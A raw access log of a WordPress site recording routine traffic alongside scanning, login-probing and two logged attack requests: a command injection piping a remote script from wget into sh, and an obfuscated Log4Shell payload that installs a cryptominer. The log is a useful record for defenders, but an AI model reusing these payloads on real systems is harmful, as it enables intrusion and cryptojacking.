66.45.237.35 - - [22/Sep/2025:03:42:20 +0800] "GET /phpMyAdmin-2.6.0-alpha/ HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:42:21 +0800] "GET /phpMyAdmin-2.6.0-alpha2/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:42:26 +0800] "GET /phpMyAdmin-2.6.0-beta1/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:42:40 +0800] "GET /phpMyAdmin-2.6.0-beta2/ HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:42:44 +0800] "GET /phpMyAdmin-2.6.0-rc1/ HTTP/1.1" 404 8991 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:42:45 +0800] "GET /phpMyAdmin-2.6.0-rc2/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
36.133.115.36 - - [22/Sep/2025:03:43:01 +0800] "POST /wp-cron.php?doing_wp_cron=1758483781.8855929374694824218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.45.237.35 - - [22/Sep/2025:03:43:01 +0800] "GET /phpMyAdmin-2.6.0-rc2/ HTTP/1.1" 404 8990 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
66.45.237.35 - - [22/Sep/2025:03:43:04 +0800] "GET /phpMyAdmin-2.6.0-rc3/ HTTP/1.1" 404 8991 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
36.133.115.36 - - [22/Sep/2025:03:47:18 +0800] "POST /wp-cron.php?doing_wp_cron=1758484038.2265119552612304687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [22/Sep/2025:03:47:18 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:04:03:16 +0800] "POST /wp-cron.php?doing_wp_cron=1758484996.2749218940734863281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.156.87.179 - - [22/Sep/2025:04:03:19 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [22/Sep/2025:04:12:25 +0800] "POST /wp-cron.php?doing_wp_cron=1758485545.7804770469665527343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.134.91.127 - - [22/Sep/2025:04:12:26 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [22/Sep/2025:04:14:17 +0800] "POST /wp-cron.php?doing_wp_cron=1758485657.8663229942321777343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [22/Sep/2025:04:14:18 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:04:19:34 +0800] "POST /wp-cron.php?doing_wp_cron=1758485974.7095079421997070312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [22/Sep/2025:04:19:35 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:04:39:07 +0800] "POST /wp-cron.php?doing_wp_cron=1758487147.2701330184936523437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.87.147.222 - - [22/Sep/2025:04:39:07 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [22/Sep/2025:04:47:20 +0800] "POST /wp-cron.php?doing_wp_cron=1758487640.0779678821563720703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [22/Sep/2025:04:47:20 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [22/Sep/2025:05:05:19 +0800] "POST /wp-cron.php?doing_wp_cron=1758488719.6740779876708984375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [22/Sep/2025:05:05:19 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:05:11:32 +0800] "POST /wp-cron.php?doing_wp_cron=1758489092.9010119438171386718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [22/Sep/2025:05:11:33 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:05:12:22 +0800] "POST /wp-cron.php?doing_wp_cron=1758489142.5805900096893310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
51.210.194.206 - - [22/Sep/2025:05:12:22 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [22/Sep/2025:05:21:54 +0800] "POST /wp-cron.php?doing_wp_cron=1758489714.7592430114746093750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [22/Sep/2025:05:21:55 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:05:29:53 +0800] "POST /wp-cron.php?doing_wp_cron=1758490193.2162408828735351562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
175.6.217.4 - - [22/Sep/2025:05:29:53 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Sep/2025:05:51:30 +0800] "POST /wp-cron.php?doing_wp_cron=1758491490.7509179115295410156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.225.238.220 - - [22/Sep/2025:05:51:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [22/Sep/2025:06:05:25 +0800] "POST /wp-cron.php?doing_wp_cron=1758492325.4501368999481201171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [22/Sep/2025:06:05:25 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:06:16:30 +0800] "POST /wp-cron.php?doing_wp_cron=1758492990.4062190055847167968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [22/Sep/2025:06:16:30 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:06:25:39 +0800] "POST /wp-cron.php?doing_wp_cron=1758493539.2210259437561035156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [22/Sep/2025:06:25:40 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [22/Sep/2025:06:35:19 +0800] "POST /wp-cron.php?doing_wp_cron=1758494119.0957798957824707031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.236.127.48 - - [22/Sep/2025:06:35:19 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [22/Sep/2025:06:42:58 +0800] "POST /wp-cron.php?doing_wp_cron=1758494578.7322700023651123046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
193.17.183.25 - - [22/Sep/2025:06:42:59 +0800] "GET / HTTP/1.0" 200 78014 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
36.133.115.36 - - [22/Sep/2025:06:56:27 +0800] "POST /wp-cron.php?doing_wp_cron=1758495387.3231849670410156250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
212.149.244.141 - - [22/Sep/2025:06:56:27 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "GRequests/0.10"
212.149.244.141 - - [22/Sep/2025:06:56:29 +0800] "POST /wp-login.php HTTP/1.1" 200 2925 "-" "GRequests/0.10"
45.142.193.144 - - [22/Sep/2025:06:56:44 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:07:06:26 +0800] "POST /wp-cron.php?doing_wp_cron=1758495986.4509720802307128906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.239.167.2 - - [22/Sep/2025:07:06:27 +0800] "GET / HTTP/1.0" 200 151897 "-" "-"
47.239.167.2 - - [22/Sep/2025:07:06:33 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
36.133.115.36 - - [22/Sep/2025:07:16:34 +0800] "POST /wp-cron.php?doing_wp_cron=1758496594.1907238960266113281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [22/Sep/2025:07:16:34 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.88.186.32 - - [22/Sep/2025:07:22:15 +0800] "GET /goform/webRead/open/?path=%7Cwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wtf.sh%7Csh HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
36.133.115.36 - - [22/Sep/2025:07:22:16 +0800] "POST /wp-cron.php?doing_wp_cron=1758496936.0004289150238037109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [22/Sep/2025:07:25:11 +0800] "POST /wp-cron.php?doing_wp_cron=1758497111.3016328811645507812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.225.238.220 - - [22/Sep/2025:07:25:11 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [22/Sep/2025:07:36:28 +0800] "POST /wp-cron.php?doing_wp_cron=1758497788.5390419960021972656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [22/Sep/2025:07:36:28 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:07:39:25 +0800] "POST /wp-cron.php?doing_wp_cron=1758497965.0934269428253173828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [22/Sep/2025:07:39:25 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.75.212.83 - - [22/Sep/2025:07:39:45 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
36.133.115.36 - - [22/Sep/2025:07:39:46 +0800] "POST /wp-cron.php?doing_wp_cron=1758497986.3535060882568359375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
80.75.212.83 - - [22/Sep/2025:07:39:46 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg== HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
36.133.115.36 - - [22/Sep/2025:08:11:06 +0800] "POST /wp-cron.php?doing_wp_cron=1758499866.8097949028015136718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.69.128.192 - - [22/Sep/2025:08:11:06 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "GRequests/0.10"
103.69.128.192 - - [22/Sep/2025:08:11:07 +0800] "POST /wp-login.php HTTP/1.1" 200 2925 "-" "GRequests/0.10"
36.133.115.36 - - [22/Sep/2025:08:20:19 +0800] "POST /wp-cron.php?doing_wp_cron=1758500419.3746249675750732421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
193.164.17.45 - - [22/Sep/2025:08:20:19 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [22/Sep/2025:08:31:59 +0800] "POST /wp-cron.php?doing_wp_cron=1758501119.6776390075683593750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [22/Sep/2025:08:32:00 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:08:36:08 +0800] "POST /wp-cron.php?doing_wp_cron=1758501368.9228489398956298828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [22/Sep/2025:08:36:08 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
36.133.115.36 - - [22/Sep/2025:08:51:23 +0800] "POST /wp-cron.php?doing_wp_cron=1758502283.0958380699157714843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [22/Sep/2025:08:51:23 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:09:17:34 +0800] "POST /wp-cron.php?doing_wp_cron=1758503854.1615569591522216796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
92.222.181.205 - - [22/Sep/2025:09:17:34 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
14.108.234.80 - - [22/Sep/2025:09:18:49 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:49 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:50 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:50 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:50 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:50 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:50 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:50 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:50 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:51 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
36.133.115.36 - - [22/Sep/2025:09:18:51 +0800] "POST /wp-cron.php?doing_wp_cron=1758503931.5222339630126953125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.234.80 - - [22/Sep/2025:09:18:51 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:51 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:51 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [22/Sep/2025:09:18:51 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
36.133.115.36 - - [22/Sep/2025:09:21:09 +0800] "POST /wp-cron.php?doing_wp_cron=1758504069.8709759712219238281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
182.42.111.213 - - [22/Sep/2025:09:21:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
182.42.111.213 - - [22/Sep/2025:09:21:18 +0800] "GET / HTTP/1.1" 200 33468 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Sep/2025:09:37:40 +0800] "POST /wp-cron.php?doing_wp_cron=1758505060.4489510059356689453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [22/Sep/2025:09:37:40 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.166.245.120 - - [22/Sep/2025:09:37:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.245.120 - - [22/Sep/2025:09:37:43 +0800] "GET / HTTP/1.1" 200 33468 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [22/Sep/2025:09:52:29 +0800] "POST /wp-cron.php?doing_wp_cron=1758505949.2830750942230224609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [22/Sep/2025:09:52:29 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
